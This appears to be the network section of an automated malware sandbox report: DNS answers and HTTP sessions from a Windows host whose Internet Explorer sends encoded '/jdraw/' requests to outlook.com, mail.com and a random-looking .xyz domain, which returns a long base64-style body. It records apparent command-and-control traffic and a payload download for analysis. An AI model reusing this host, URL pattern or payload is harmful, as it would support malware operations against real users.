Jul 6, 2021 14:30:14.160443068 CEST	8.8.8.8	192.168.2.4	0x9331	No error (0)	FRA-efz.ms-acdc.office.com		40.101.80.178	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.203434944 CEST	8.8.8.8	192.168.2.4	0x40a6	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.203434944 CEST	8.8.8.8	192.168.2.4	0x40a6	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.203434944 CEST	8.8.8.8	192.168.2.4	0x40a6	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.203434944 CEST	8.8.8.8	192.168.2.4	0x40a6	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.203434944 CEST	8.8.8.8	192.168.2.4	0x40a6	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.203434944 CEST	8.8.8.8	192.168.2.4	0x40a6	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.203434944 CEST	8.8.8.8	192.168.2.4	0x40a6	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.203434944 CEST	8.8.8.8	192.168.2.4	0x40a6	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.823123932 CEST	8.8.8.8	192.168.2.4	0xdb79	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:18.823123932 CEST	8.8.8.8	192.168.2.4	0xdb79	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:18.823123932 CEST	8.8.8.8	192.168.2.4	0xdb79	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:18.823123932 CEST	8.8.8.8	192.168.2.4	0xdb79	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:18.823123932 CEST	8.8.8.8	192.168.2.4	0xdb79	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.18	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.823123932 CEST	8.8.8.8	192.168.2.4	0xdb79	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.194	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.823123932 CEST	8.8.8.8	192.168.2.4	0xdb79	No error (0)	HHN-efz.ms-acdc.office.com		40.101.136.18	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:18.823123932 CEST	8.8.8.8	192.168.2.4	0xdb79	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.178	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:19.109352112 CEST	8.8.8.8	192.168.2.4	0xce0e	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:19.109352112 CEST	8.8.8.8	192.168.2.4	0xce0e	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:19.109352112 CEST	8.8.8.8	192.168.2.4	0xce0e	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:19.109352112 CEST	8.8.8.8	192.168.2.4	0xce0e	No error (0)	FRA-efz.ms-acdc.office.com		40.101.81.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:19.109352112 CEST	8.8.8.8	192.168.2.4	0xce0e	No error (0)	FRA-efz.ms-acdc.office.com		52.97.250.226	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:19.109352112 CEST	8.8.8.8	192.168.2.4	0xce0e	No error (0)	FRA-efz.ms-acdc.office.com		40.101.80.178	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:25.134272099 CEST	8.8.8.8	192.168.2.4	0xe7dd	No error (0)	mail.com		82.165.229.87	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:25.736529112 CEST	8.8.8.8	192.168.2.4	0x58f5	No error (0)	www.mail.com		82.165.229.59	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:26.129261971 CEST	8.8.8.8	192.168.2.4	0x5878	No error (0)	dl.mail.com	dl.mail.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:26.696901083 CEST	8.8.8.8	192.168.2.4	0xc8ea	No error (0)	s.uicdn.com	s.uicdn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:27.318406105 CEST	8.8.8.8	192.168.2.4	0x826c	No error (0)	wa.mail.com		82.165.229.16	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:27.748572111 CEST	8.8.8.8	192.168.2.4	0x375f	No error (0)	img.ui-portal.de	img.ui-portal.de.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:28.375650883 CEST	8.8.8.8	192.168.2.4	0x830a	No error (0)	plus.mail.com	plusmailcom.ha-cdn.de		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:28.375650883 CEST	8.8.8.8	192.168.2.4	0x830a	No error (0)	plusmailcom.ha-cdn.de		195.20.250.115	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:35.772088051 CEST	8.8.8.8	192.168.2.4	0x4ca4	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:35.772088051 CEST	8.8.8.8	192.168.2.4	0x4ca4	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:35.772088051 CEST	8.8.8.8	192.168.2.4	0x4ca4	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:35.772088051 CEST	8.8.8.8	192.168.2.4	0x4ca4	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:35.772088051 CEST	8.8.8.8	192.168.2.4	0x4ca4	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:35.772088051 CEST	8.8.8.8	192.168.2.4	0x4ca4	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:35.772088051 CEST	8.8.8.8	192.168.2.4	0x4ca4	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:35.772088051 CEST	8.8.8.8	192.168.2.4	0x4ca4	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.479466915 CEST	8.8.8.8	192.168.2.4	0xe714	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:36.479466915 CEST	8.8.8.8	192.168.2.4	0xe714	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:36.479466915 CEST	8.8.8.8	192.168.2.4	0xe714	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:36.479466915 CEST	8.8.8.8	192.168.2.4	0xe714	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:36.479466915 CEST	8.8.8.8	192.168.2.4	0xe714	No error (0)	HHN-efz.ms-acdc.office.com		40.101.136.2	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.479466915 CEST	8.8.8.8	192.168.2.4	0xe714	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.2	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.479466915 CEST	8.8.8.8	192.168.2.4	0xe714	No error (0)	HHN-efz.ms-acdc.office.com		52.97.201.50	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.479466915 CEST	8.8.8.8	192.168.2.4	0xe714	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.194	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.793477058 CEST	8.8.8.8	192.168.2.4	0x12a0	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:36.793477058 CEST	8.8.8.8	192.168.2.4	0x12a0	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:36.793477058 CEST	8.8.8.8	192.168.2.4	0x12a0	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:36.793477058 CEST	8.8.8.8	192.168.2.4	0x12a0	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.34	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.793477058 CEST	8.8.8.8	192.168.2.4	0x12a0	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.178	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.793477058 CEST	8.8.8.8	192.168.2.4	0x12a0	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.242	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:36.793477058 CEST	8.8.8.8	192.168.2.4	0x12a0	No error (0)	HHN-efz.ms-acdc.office.com		52.97.201.50	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:37.075551987 CEST	8.8.8.8	192.168.2.4	0x882e	No error (0)	mail.com		82.165.229.87	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:37.400434971 CEST	8.8.8.8	192.168.2.4	0x21c0	No error (0)	www.mail.com		82.165.229.59	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:37.745018005 CEST	8.8.8.8	192.168.2.4	0x5cfe	No error (0)	s.uicdn.com	s.uicdn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 14:30:37.812722921 CEST	8.8.8.8	192.168.2.4	0x4e29	No error (0)	www.googleoptimize.com		142.250.180.206	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:38.520617008 CEST	8.8.8.8	192.168.2.4	0xd58d	No error (0)	wa.ui-portal.de		82.165.229.54	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:38.580883980 CEST	8.8.8.8	192.168.2.4	0x46ab	No error (0)	wa.mail.com		82.165.229.16	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:42.019243002 CEST	8.8.8.8	192.168.2.4	0xfeb4	No error (0)	mail.com		82.165.229.87	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:42.292562008 CEST	8.8.8.8	192.168.2.4	0x3e62	No error (0)	www.mail.com		82.165.229.59	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:43.936813116 CEST	8.8.8.8	192.168.2.4	0x2c89	No error (0)	wa.ui-portal.de		82.165.229.54	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:43.949042082 CEST	8.8.8.8	192.168.2.4	0x5e6f	No error (0)	wa.mail.com		82.165.229.16	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:49.516295910 CEST	8.8.8.8	192.168.2.4	0x86bd	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:30:52.223323107 CEST	8.8.8.8	192.168.2.4	0x2ed6	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:00.002360106 CEST	8.8.8.8	192.168.2.4	0x2167	No error (0)	mail.com		82.165.229.87	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:00.279405117 CEST	8.8.8.8	192.168.2.4	0x432b	No error (0)	www.mail.com		82.165.229.59	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:01.886153936 CEST	8.8.8.8	192.168.2.4	0x2807	No error (0)	wa.ui-portal.de		82.165.229.54	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:01.895236969 CEST	8.8.8.8	192.168.2.4	0x2205	No error (0)	wa.mail.com		82.165.229.16	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:02.023242950 CEST	8.8.8.8	192.168.2.4	0x8008	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:07.388247967 CEST	8.8.8.8	192.168.2.4	0xaf7a	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:07.393089056 CEST	8.8.8.8	192.168.2.4	0xbac8	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:11.293025970 CEST	8.8.8.8	192.168.2.4	0xc237	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:11.299817085 CEST	8.8.8.8	192.168.2.4	0xf56f	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:14.376348972 CEST	8.8.8.8	192.168.2.4	0x3a32	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:25.001909971 CEST	8.8.8.8	192.168.2.4	0x1c32	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:30.148782015 CEST	8.8.8.8	192.168.2.4	0x2ad5	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:35.391314983 CEST	8.8.8.8	192.168.2.4	0xdb00	No error (0)	taybhctdyehfhgthp2.xyz		45.90.58.179	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:47.517627001 CEST	8.8.8.8	192.168.2.4	0x33c7	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Jul 6, 2021 14:31:47.520133972 CEST	8.8.8.8	192.168.2.4	0x7be8	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

outlook.com

mail.com

taybhctdyehfhgthp2.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49782	40.97.116.82	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:30:01.336796999 CEST	3594	OUT	GET /jdraw/4TWYD_2BKnV08xS5_/2F7HOCZrKwN0/4Zpub6ftuB_/2BizrVf_2BAEup/ooDnvqHPfcHYlzHuUeiq_/2BOcpQ3mscYC5ZQS/bCsofKuPGmQwD_2/FVd5R5hEPIiJUNt23U/AcieANSDJ/mLDV7I5LTSGIHgpcJd6S/EuKELXcxsS6HB64bzGC/Qm4swXvWNsxPSQQ_2B6aDm/9BguH_2BrAi/sCi.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: outlook.com Connection: Keep-Alive
Jul 6, 2021 14:30:01.519323111 CEST	3595	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.com/jdraw/4TWYD_2BKnV08xS5_/2F7HOCZrKwN0/4Zpub6ftuB_/2BizrVf_2BAEup/ooDnvqHPfcHYlzHuUeiq_/2BOcpQ3mscYC5ZQS/bCsofKuPGmQwD_2/FVd5R5hEPIiJUNt23U/AcieANSDJ/mLDV7I5LTSGIHgpcJd6S/EuKELXcxsS6HB64bzGC/Qm4swXvWNsxPSQQ_2B6aDm/9BguH_2BrAi/sCi.crw Server: Microsoft-IIS/10.0 request-id: 7c4222da-06c3-37b3-67e5-33870281df1c X-FEServer: MWHPR13CA0001 X-RequestId: f937104f-1d36-468d-807b-e221fbf197ca X-Powered-By: ASP.NET X-FEServer: MWHPR13CA0001 Date: Tue, 06 Jul 2021 12:30:01 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49807	82.165.229.87	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:30:25.428689957 CEST	4309	OUT	GET /jdraw/hRJbHpe2NUnd/Fqb6HJaKW_2/FkOSHsbbOjgHBf/KmDpJnEWchUKTqeK6k0hw/2AQJw6Tfj2Wghg40/cDBy1qgsd1Bh7XA/8XTTdRafkqQVGKHltr/VPRzK_2FJ/vWFbmfMAYjdSfOaB_2Fb/Hhjr_2BzU1ZKuqO0buX/LCyXURXRCX4qhBBiB401RQ/MfqjvWezuBF_2/FVb574obq_/2Bf0.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: mail.com Connection: Keep-Alive
Jul 6, 2021 14:30:25.471698999 CEST	4310	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 06 Jul 2021 12:30:25 GMT Server: Apache Location: https://mail.com/jdraw/hRJbHpe2NUnd/Fqb6HJaKW_2/FkOSHsbbOjgHBf/KmDpJnEWchUKTqeK6k0hw/2AQJw6Tfj2Wghg40/cDBy1qgsd1Bh7XA/8XTTdRafkqQVGKHltr/VPRzK_2FJ/vWFbmfMAYjdSfOaB_2Fb/Hhjr_2BzU1ZKuqO0buX/LCyXURXRCX4qhBBiB401RQ/MfqjvWezuBF_2/FVb574obq_/2Bf0.crw Content-Length: 452 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 63 6f 6d 2f 6a 64 72 61 77 2f 68 52 4a 62 48 70 65 32 4e 55 6e 64 2f 46 71 62 36 48 4a 61 4b 57 5f 32 2f 46 6b 4f 53 48 73 62 62 4f 6a 67 48 42 66 2f 4b 6d 44 70 4a 6e 45 57 63 68 55 4b 54 71 65 4b 36 6b 30 68 77 2f 32 41 51 4a 77 36 54 66 6a 32 57 67 68 67 34 30 2f 63 44 42 79 31 71 67 73 64 31 42 68 37 58 41 2f 38 58 54 54 64 52 61 66 6b 71 51 56 47 4b 48 6c 74 72 2f 56 50 52 7a 4b 5f 32 46 4a 2f 76 57 46 62 6d 66 4d 41 59 6a 64 53 66 4f 61 42 5f 32 46 62 2f 48 68 6a 72 5f 32 42 7a 55 31 5a 4b 75 71 4f 30 62 75 58 2f 4c 43 79 58 55 52 58 52 43 58 34 71 68 42 42 69 42 34 30 31 52 51 2f 4d 66 71 6a 76 57 65 7a 75 42 46 5f 32 2f 46 56 62 35 37 34 6f 62 71 5f 2f 32 42 66 30 2e 63 72 77 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mail.com/jdraw/hRJbHpe2NUnd/Fqb6HJaKW_2/FkOSHsbbOjgHBf/KmDpJnEWchUKTqeK6k0hw/2AQJw6Tfj2Wghg40/cDBy1qgsd1Bh7XA/8XTTdRafkqQVGKHltr/VPRzK_2FJ/vWFbmfMAYjdSfOaB_2Fb/Hhjr_2BzU1ZKuqO0buX/LCyXURXRCX4qhBBiB401RQ/MfqjvWezuBF_2/FVb574obq_/2Bf0.crw">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49893	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:31:25.136749029 CEST	12186	OUT	GET /jdraw/1n_2BflhePO/uMnCopo6qdTrYV/FWhAJA9XLeWgIwqNDciEV/Ma2pywOVrVC7gojv/E6T3hs07V6KYbye/xvW81IAf7IZHKKI_2B/RArbctFfL/2TGsfNIzn81_2FbGpeyH/ukdp1ZDGefO14nBo8EX/nrPB_2FBmNloUapimH_2FE/RWs6DX_2B2Z0G/i8D3YZuF/j1ldvh1CQhgEI/V37EE.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:31:25.193449974 CEST	12188	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:31:25 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 61 35 63 30 0d 0a 54 37 50 43 46 2b 46 31 4a 55 4b 41 54 62 62 73 6b 6e 55 32 76 58 53 4c 57 30 70 45 54 4a 56 69 7a 51 2b 44 68 35 45 4d 66 73 37 78 45 66 79 46 33 4b 48 51 69 53 71 48 7a 55 68 43 2b 65 4f 65 34 78 4f 6d 6b 74 78 46 38 68 6b 49 4e 50 41 79 47 77 74 4c 75 78 6a 7a 51 55 58 30 64 4f 6c 78 52 68 6c 32 49 79 4d 71 6a 6c 52 6b 53 79 56 4f 65 72 75 63 56 6c 49 33 75 36 35 62 70 6a 30 4f 6d 52 76 43 57 47 38 4a 71 2b 4c 33 74 4a 74 4f 76 31 74 42 74 47 5a 58 5a 42 6c 75 79 32 70 34 54 56 54 57 67 70 50 7a 4f 51 77 76 6d 30 72 68 56 73 4f 48 62 78 44 4b 4c 7a 6b 59 36 4d 50 32 52 32 47 70 50 39 78 71 42 52 46 34 67 7a 30 48 74 53 4d 58 6a 77 44 4e 77 71 46 63 49 32 34 46 62 2b 31 2b 64 73 65 35 69 4c 44 66 51 79 42 35 71 37 33 61 6d 39 61 52 67 36 74 75 43 71 65 53 47 50 4e 64 75 30 44 6f 72 43 2b 65 36 35 37 42 6b 32 69 57 66 4b 4e 72 45 4a 47 34 33 76 4a 4e 2b 68 45 30 6f 4c 37 69 76 34 31 4c 50 36 37 33 61 4b 41 35 6c 33 62 49 48 6f 46 77 4c 30 4f 78 37 6a 69 48 37 5a 36 52 4e 61 37 42 2b 38 42 66 6d 34 51 42 66 4e 31 68 30 55 35 75 47 73 65 68 71 78 7a 56 48 33 46 65 44 77 4f 6b 42 7a 75 43 39 6a 62 4a 7a 77 4c 4b 38 61 2b 6a 49 67 51 53 4a 52 6d 4d 54 43 72 32 33 79 67 67 46 4d 42 75 6b 39 34 32 4c 57 52 45 46 4a 79 58 57 32 52 65 47 61 38 61 63 75 79 7a 54 36 55 57 5a 35 68 4f 58 6e 79 58 54 43 46 61 39 48 76 4c 71 72 56 36 41 74 56 6c 78 62 34 46 37 34 49 51 63 79 50 6f 36 4d 4a 2f 58 6c 74 57 52 6e 44 66 55 61 4d 62 6f 4e 6d 51 58 41 70 4c 56 39 49 4a 66 4a 74 36 50 55 37 7a 66 78 59 37 48 46 4d 4c 68 59 49 62 7a 61 61 43 75 63 71 58 57 33 61 77 6b 30 4e 44 31 54 30 6e 36 4e 36 59 35 57 44 44 6f 69 4e 7a 4b 64 51 4a 4b 69 6e 48 2f 4b 73 4b 32 71 2f 30 2b 34 69 53 42 31 53 33 63 50 35 4a 77 31 54 48 77 4f 45 37 74 6b 77 54 71 71 2f 6b 4e 33 65 63 37 64 6d 38 75 47 30 70 4c 64 2b 63 69 4d 6d 42 68 44 41 31 4c 78 69 6c 53 72 6a 36 6d 64 6f 45 70 6f 55 7a 68 51 30 63 49 6b 69 59 7a 6e 4c 49 4f 41 75 4b 4c 4a 76 43 78 39 4b 32 6c 2f 70 58 35 76 68 52 47 45 49 34 57 69 4b 6d 73 33 34 4e 76 78 44 77 31 42 72 70 70 65 48 66 71 36 6d 35 62 5a 4a 2b 6a 47 6e 57 51 33 56 54 43 39 68 70 2b 7a 62 30 6b 50 51 41 4a 38 61 6f 6d 73 4b 35 45 4d 4b 41 6a 38 75 65 45 4f 70 66 79 6e 54 53 6b 4c 68 61 52 43 6b 5a 31 48 65 2f 34 59 7a 4e 38 41 58 31 6b 50 45 73 4c 2b 71 47 41 69 41 6c 51 50 45 54 62 4c 65 72 36 48 61 2b 76 66 77 69 5a 50 34 41 58 55 33 77 49 42 45 62 78 48 72 67 6e 4e 2f 47 67 38 66 36 33 47 6d 33 38 42 66 52 68 50 77 59 39 6a 79 47 52 34 42 56 50 35 78 39 4a 66 43 32 35 6f 61 74 2f 6e 57 35 4e 39 68 73 5a 4b 34 48 33 6f 64 71 52 4f 75 44 59 31 53 4c 76 6b 42 64 57 72 65 54 42 78 75 55 37 72 67 34 2b 45 6c 41 45 6c 52 7a 52 70 48 37 63 67 52 50 72 32 4a 7a 47 35 79 51 55 36 55 34 38 51 31 6f 6b 44 31 4c 42 33 7a 6b 66 46 67 74 4d 46 35 6f 68 43 56 70 72 38 4d 54 37 51 75 34 51 50 38 73 6e 50 Data Ascii: 3a5c0T7PCF+F1JUKATbbsknU2vXSLW0pETJVizQ+Dh5EMfs7xEfyF3KHQiSqHzUhC+eOe4xOmktxF8hkINPAyGwtLuxjzQUX0dOlxRhl2IyMqjlRkSyVOerucVlI3u65bpj0OmRvCWG8Jq+L3tJtOv1tBtGZXZBluy2p4TVTWgpPzOQwvm0rhVsOHbxDKLzkY6MP2R2GpP9xqBRF4gz0HtSMXjwDNwqFcI24Fb+1+dse5iLDfQyB5q73am9aRg6tuCqeSGPNdu0DorC+e657Bk2iWfKNrEJG43vJN+hE0oL7iv41LP673aKA5l3bIHoFwL0Ox7jiH7Z6RNa7B+8Bfm4QBfN1h0U5uGsehqxzVH3FeDwOkBzuC9jbJzwLK8a+jIgQSJRmMTCr23yggFMBuk942LWREFJyXW2ReGa8acuyzT6UWZ5hOXnyXTCFa9HvLqrV6AtVlxb4F74IQcyPo6MJ/XltWRnDfUaMboNmQXApLV9IJfJt6PU7zfxY7HFMLhYIbzaaCucqXW3awk0ND1T0n6N6Y5WDDoiNzKdQJKinH/KsK2q/0+4iSB1S3cP5Jw1THwOE7tkwTqq/kN3ec7dm8uG0pLd+ciMmBhDA1LxilSrj6mdoEpoUzhQ0cIkiYznLIOAuKLJvCx9K2l/pX5vhRGEI4WiKms34NvxDw1BrppeHfq6m5bZJ+jGnWQ3VTC9hp+zb0kPQAJ8aomsK5EMKAj8ueEOpfynTSkLhaRCkZ1He/4YzN8AX1kPEsL+qGAiAlQPETbLer6Ha+vfwiZP4AXU3wIBEbxHrgnN/Gg8f63Gm38BfRhPwY9jyGR4BVP5x9JfC25oat/nW5N9hsZK4H3odqROuDY1SLvkBdWreTBxuU7rg4+ElAElRzRpH7cgRPr2JzG5yQU6U48Q1okD1LB3zkfFgtMF5ohCVpr8MT7Qu4QP8snP
Jul 6, 2021 14:31:25.193547010 CEST	12189	IN	Data Raw: 70 72 46 6b 52 6e 74 65 4e 31 71 34 6b 53 6b 68 4d 51 78 4e 2f 50 34 44 71 52 45 2f 6e 54 45 71 41 48 4c 48 41 6c 32 2b 45 4c 6d 49 33 51 52 42 52 47 4e 6a 53 65 63 72 4b 73 62 45 71 4f 53 4c 39 70 75 70 42 6e 6d 71 34 67 46 6e 66 74 6b 30 61 34 Data Ascii: prFkRnteN1q4kSkhMQxN/P4DqRE/nTEqAHLHAl2+ELmI3QRBRGNjSecrKsbEqOSL9pupBnmq4gFnftk0a4yQEkxphjhr12paTp3m6LC7H1HP+1MMCpo9tvgu0ogeyNvtRpW/ywVMxJrWS84trZHHPoz55qf56RD275lvuEOo9p3lWdqGyHoI6gVDvotLEtUu4MwlYm1E5yQMU1OZj0uN8RmMMwTy5P8cXm6PQc/Je3n4N0Boys6
